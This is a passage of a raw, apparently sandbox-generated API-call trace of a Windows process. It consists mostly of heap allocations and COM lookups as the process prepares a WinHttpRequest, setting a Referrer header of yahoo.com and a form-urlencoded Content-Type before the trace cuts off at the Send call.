lpMsg=0x91faac) returned 0 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b48 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a390 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a78 [0263.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xedf188 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d528 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a390 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a918 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a2b8 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a510 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a348 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca18d8 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d550 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a258 [0263.340] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca18d8 [0263.340] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0263.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a270 [0263.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a960 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a510 | out: hHeap=0xc60000) returned 1 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2b8 | out: hHeap=0xc60000) returned 1 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d528 | out: hHeap=0xc60000) returned 1 [0263.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a348 [0263.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca18d8 [0263.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd8da58 [0263.341] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x22) returned 0xe903a8 [0263.341] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xcadc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x91f3b8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x91f4bc | out: rgDispId=0x91f4bc*=2) returned 0x0 [0263.341] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe903a8 | out: hHeap=0xc60000) returned 1 [0263.341] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xcadc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x91f3b0 | out: ppTInfo=0x91f3b0*=0xea4524) returned 0x0 [0263.341] ITypeInfo:RemoteGetTypeAttr (in: This=0xea4524, ppTypeAttr=0x91f3a8, pDummy=0x356310 | out: ppTypeAttr=0x91f3a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalGetIDsOfNames (This=0xea4524) returned 0x0 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x0, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x1, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x2, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x3, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x4, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x5, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x6, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x7, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x8, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x9, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0xa, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.342] ITypeInfo:LocalReleaseTypeAttr (This=0xea4524) returned 0xe4f2d8 [0263.342] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.342] WinHttpRequest:IUnknown:Release (This=0xea4524) returned 0x1 [0263.342] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x34) returned 0xed2ef8 [0263.343] WinHttpRequest:IDispatch:Invoke (in: This=0xcadc30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x91f4a0*(rgvarg=([0]=0xed2efc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xed2f0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468, puArgErr=0x91f4b0 | out: pDispParams=0x91f4a0*(rgvarg=([0]=0xed2efc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xed2f0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x91f4b0*=0x2b5995) returned 0x0 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8da58 | out: hHeap=0xc60000) returned 1 [0263.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a510 [0263.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0263.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ad8 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2ef8 | out: hHeap=0xc60000) returned 1 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0263.343] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a348 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a510 | out: hHeap=0xc60000) returned 1 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xedf188 | out: hHeap=0xc60000) returned 1 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0263.343] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a258 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a960 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d550 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.344] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1ad8 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a348 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b48 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xedf188 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d550 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a348 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a270 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a960 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a258 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a78 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a510 [0263.344] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d528 [0263.344] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a390 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a78 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a510 | out: hHeap=0xc60000) returned 1 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a510 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a510 | out: hHeap=0xc60000) returned 1 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a960 | out: hHeap=0xc60000) returned 1 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a258 | out: hHeap=0xc60000) returned 1 [0263.345] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d550 | out: hHeap=0xc60000) returned 1 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a258 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a78 [0263.345] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd8da58 [0263.346] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x22) returned 0xe903a8 [0263.346] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xcadc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x91f3b8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x91f4bc | out: rgDispId=0x91f4bc*=2) returned 0x0 [0263.346] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe903a8 | out: hHeap=0xc60000) returned 1 [0263.346] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xcadc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x91f3b0 | out: ppTInfo=0x91f3b0*=0xea4524) returned 0x0 [0263.346] ITypeInfo:RemoteGetTypeAttr (in: This=0xea4524, ppTypeAttr=0x91f3a8, pDummy=0x356310 | out: ppTypeAttr=0x91f3a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalGetIDsOfNames (This=0xea4524) returned 0x0 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x0, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x1, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x2, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xc9b318 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x3, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x4, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x5, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x6, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.346] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x7, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.346] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.347] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x8, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.347] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.347] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0x9, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.347] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.347] ITypeInfo:RemoteGetFuncDesc (in: This=0xea4524, index=0xa, ppFuncDesc=0x91f3ac, pDummy=0x356310 | out: ppFuncDesc=0x91f3ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.347] ITypeInfo:LocalReleaseTypeAttr (This=0xea4524) returned 0xe4f2d8 [0263.347] ITypeInfo:LocalReleaseFuncDesc (This=0xea4524) returned 0xe7c100 [0263.347] WinHttpRequest:IUnknown:Release (This=0xea4524) returned 0x1 [0263.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x34) returned 0xed2ef8 [0263.347] WinHttpRequest:IDispatch:Invoke (in: This=0xcadc30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x91f4a0*(rgvarg=([0]=0xed2efc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xed2f0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468, puArgErr=0x91f4b0 | out: pDispParams=0x91f4a0*(rgvarg=([0]=0xed2efc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xed2f0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x91f468*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x91f4b0*=0x2b5995) returned 0x0 [0263.347] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd8da58 | out: hHeap=0xc60000) returned 1 [0263.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0263.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a270 [0263.347] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca18d8 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2ef8 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a258 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a258 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3a8 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xedf188 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2e8 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a390 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d528 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0263.348] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a258 | out: hHeap=0xc60000) returned 1 [0263.348] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca18d8 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a258 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ad8 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d528 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a270 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3f0 [0263.348] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7b620 [0263.349] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d550 [0263.349] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a390 [0263.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a3f0 | out: hHeap=0xc60000) returned 1 [0263.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0263.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d528 | out: hHeap=0xc60000) returned 1 [0263.349] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0263.349] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b48 [0263.349] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd8da58 [0263.349] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xd7a270 [0263.349] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xcadc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x91f3b8*="Send", cNames=0x1, lcid=0x800, rgDispId=0x91f4bc | out: rgDispId=0x91f4bc*=5) returned 0x0 [0263.349] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.349] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xcadc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x91f3b0 | out: ppTInfo=0x91f3b0*=0xea4524) returned 0x0 [0263.349] ITypeInfo:RemoteGetTypeAttr (in: This=0xea4524, ppTypeAttr=0x91f3a8, pDummy=0x356310 | out: ppTypeAttr=0x91f3a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0263.349] ITypeInfo:LocalGetIDsOfNames 